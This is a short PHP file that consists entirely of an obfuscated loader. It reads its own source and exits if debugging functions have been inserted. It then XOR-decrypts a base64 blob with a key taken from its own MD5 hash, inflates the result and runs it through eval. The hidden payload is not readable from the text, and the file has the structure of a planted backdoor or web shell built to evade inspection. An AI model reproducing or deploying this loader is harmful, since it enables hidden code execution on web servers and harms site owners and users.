<?php
$juzyuh="9f8ac5203f09dc02d33cc68f1be67988";
$jxhdhvou="0a510c5302530a080504525c555105035552525750065c050400030f52095d00";
$hlkssra="+Htn4imrFRCftjJMHHwYu2curf2aZOu2YcrPaCUhNIiGYuQHtdJqiIEx0tQe+h1h+a0q+hp9LTY1Se72rr9i6Ul3LUcK4prsqoA2+UsAxoHaqCr9f4NiYw==";
$grzfeguacvk=file_get_contents(__FILE__);
$pzyalwozjvc=str_replace($hlkssra,"",$grzfeguacvk);
if(strpos($pzyalwozjvc,"ec"."ho")!==false||strpos($pzyalwozjvc,"pr"."int")!==false||strpos($pzyalwozjvc,"var_"."dump")!==false||strpos($pzyalwozjvc,"file_put_"."contents")!==false||strpos($pzyalwozjvc,"fw"."rite")!==false){die();}
$brjsfp=str_replace(array($juzyuh,$jxhdhvou),array("SP_01c2e81a","KP_e93c8979"),$grzfeguacvk);
$hnqgbokk=md5($brjsfp);
$rokphofvx=hex2bin($jxhdhvou);
$uftmknk="";
$waeffcy=strlen($hnqgbokk);
for($wkwykccfi=0;$wkwykccfi<$waeffcy;$wkwykccfi++){
    $uftmknk.=chr(ord($rokphofvx[$wkwykccfi])^ord($hnqgbokk[$wkwykccfi]));
}
$tbyzocj=base64_decode($hlkssra);
$rwtyavnatg=strlen($tbyzocj);
$dtvuvd="";
$onreeau=strlen($uftmknk);
for($wkwykccfi=0;$wkwykccfi<$rwtyavnatg;$wkwykccfi++){
    $dtvuvd.=$tbyzocj[$wkwykccfi]^$uftmknk[$wkwykccfi%$onreeau];
}
$kwzsgcfvq="gz"."in"."fl"."ate";
eval($kwzsgcfvq($dtvuvd));
